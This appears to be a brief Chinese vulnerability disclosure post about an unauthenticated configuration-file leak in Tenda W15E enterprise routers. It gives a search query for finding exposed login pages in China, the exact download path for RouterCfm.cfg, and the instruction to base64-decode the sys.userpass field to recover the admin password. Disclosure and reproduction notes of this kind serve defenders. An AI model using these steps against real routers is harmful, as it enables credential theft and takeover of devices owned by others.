Tenda W15E企业级路由器 RouterCfm.cfg 配置文件泄漏漏洞
# Tenda W15E企业级路由器 RouterCfm.cfg 配置文件泄漏漏洞
## 漏洞描述
Tenda 企业级路由器 RouterCfm.cfg 配置文件可在未授权的情况下被读取,导致账号密码等敏感信息泄漏
## 漏洞影...
Tenda W15E企业级路由器 RouterCfm.cfg 配置文件泄漏漏洞
漏洞描述
Tenda 企业级路由器 RouterCfm.cfg 配置文件可在未授权的情况下被读取,导致账号密码等敏感信息泄漏
漏洞影响
Tenda 企业级路由器
网络测绘
title=="Tenda | Login" && country="CN"
漏洞复现
登录页面
访问路径
/cgi-bin/DownloadCfg/RouterCfm.cfg
后台账号密码位于参数 sys.userpass base64解密后的字符
- 发表于 2024-07-12 18:50:01
- 阅读 ( 2002 )
- 分类:网络设备
带头大哥
456 篇文章